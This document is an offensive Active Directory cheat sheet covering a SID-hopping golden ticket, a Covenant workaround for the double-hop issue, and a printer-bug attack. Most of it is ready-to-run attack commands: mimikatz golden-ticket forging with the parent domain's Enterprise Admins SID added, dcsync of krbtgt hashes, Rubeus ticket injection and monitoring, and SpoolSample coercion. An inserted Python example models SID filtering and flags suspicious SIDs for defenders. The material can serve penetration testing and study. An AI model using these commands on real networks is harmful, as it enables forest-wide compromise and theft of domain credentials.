Use only the FQDN, never the IP address, once the ticket is loaded: Kerberos tickets are bound to a service name, so connecting by IP falls back to NTLM and the injected ticket is not used.

Be aware of the double hop issue:

SID-hopping golden ticket

SID hopping only works between two domains within the same forest: according to Microsoft, all domain trusts in an Active Directory forest are two-way, transitive trusts, and SID filtering is not applied to them by default, so the extra SID (here the parent domain's Enterprise Admins, RID 519) is honoured by the parent domain.
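To make the rule above concrete, here is an added Python example (not part of these notes): it models, in a simplified way, the SID-filtering decision that decides whether an extra SID such as <parent domain SID>-519 carried in a ticket is kept by the trusting domain, and gives a defender's helper that lists the privileged foreign SIDs that filtering would strip. The domain SIDs and the simplified trust rules (no filtering intra-forest, quarantine keeps only the trusted domain's own SIDs) are assumptions of this example.

```python
# Added example, not part of the original notes: a small model of why the
# /sids:<parent SID>-519 entry works inside a forest and is stopped at a
# forest boundary with SID filtering (quarantine) enabled. Simplified
# assumption: an intra-forest (parent/child) trust applies no SID filtering,
# while a filtered trust keeps only extra SIDs whose domain part equals the
# trusted domain's own SID. All SIDs used below are constructed.
from dataclasses import dataclass

ENTERPRISE_ADMINS_RID = 519   # forest-root "Enterprise Admins" RID
DOMAIN_ADMINS_RID = 512       # "Domain Admins" RID
PRIVILEGED_RIDS = {ENTERPRISE_ADMINS_RID, DOMAIN_ADMINS_RID}


@dataclass(frozen=True)
class Sid:
    domain: str   # everything up to the last "-", e.g. S-1-5-21-...-333
    rid: int      # trailing relative identifier, e.g. 519

    @classmethod
    def parse(cls, text: str) -> "Sid":
        if not text.startswith("S-1-") or text.count("-") < 3:
            raise ValueError(f"not a SID: {text!r}")
        head, _, rid = text.rpartition("-")
        return cls(head, int(rid))


def filter_extra_sids(extra_sids, trusted_domain_sid, sid_filtering):
    """Return the extra SIDs the trusting domain keeps from a ticket issued
    by trusted_domain_sid. sid_filtering=False (intra-forest default) keeps
    everything; sid_filtering=True keeps only the trusted domain's own SIDs."""
    kept = []
    for text in extra_sids:
        sid = Sid.parse(text)
        if sid_filtering and sid.domain != trusted_domain_sid:
            continue   # quarantined: claims membership in another domain
        kept.append(text)
    return kept


def privileged_foreign_sids(extra_sids, trusted_domain_sid):
    """Defender's view: extra SIDs that do not belong to the domain that
    issued the ticket and carry a privileged RID. These are the entries SID
    filtering would strip and that are worth alerting on when seen."""
    found = []
    for text in extra_sids:
        sid = Sid.parse(text)
        if sid.domain != trusted_domain_sid and sid.rid in PRIVILEGED_RIDS:
            found.append(text)
    return found


if __name__ == "__main__":
    PARENT_SID = "S-1-5-21-111-222-333"   # constructed forest-root domain SID
    CHILD_SID = "S-1-5-21-444-555-666"    # constructed child domain SID
    extra = [f"{PARENT_SID}-{ENTERPRISE_ADMINS_RID}"]
    print("intra-forest :", filter_extra_sids(extra, CHILD_SID, sid_filtering=False))
    print("filtered     :", filter_extra_sids(extra, CHILD_SID, sid_filtering=True))
    print("to alert on  :", privileged_foreign_sids(extra, CHILD_SID))
```

The practical takeaway is the one these notes state: inside a forest the parent SID-519 entry survives, so the forest, not the domain, is the security boundary; across a filtered forest trust the same entry is dropped.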


Retrieve infos

Parent domain SID (take the SID returned below and replace its trailing RID with 519): (New-Object System.Security.Principal.NTAccount("<domain>","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
krbtgt: dcsync <fqdn_child_domain> <child_domain>\krbtgt
Get-DomainSID -Domain <fqdn_child_domain>
Get-NetComputer <DC_name>.<fqdn_child_domain>

Forge and load ticket into memory

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /ptt


lsadump::dcsync /domain:<> /user:<target>\krbtgt
Covenant - defeating the double hop issue

Make a token for a user in the compromised domain

MakeToken <user> <domain> '' 9   (empty password, logon type 9 = new credentials)

Forge the ticket

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /export
echo "<B64>" | base64 -d > ticket.kirbi

Upload the ticket and inject it into memory

upload ticket.kirbi
Rubeus renew /ticket:ticket.kirbi /ptt


lsadump::dcsync /domain:<> /user:<target>\krbtgt

Printer bug

In this illustration the target DC is named dc02, so the same name appears in both commands below.

Retrieve infos

powershell Get-DomainComputer -Domain <>
.\Rubeus.exe monitor /interval:5 /filteruser:dc02$
.\SpoolSample_v4.5_x64.exe <> <>
cat tmp.b64 | tr -d ' ' | tr -d '\n' > ticket.b64
Rubeus.exe ptt /ticket:<b64>
lsadump::dcsync /domain:<> /user:<target>\krbtgt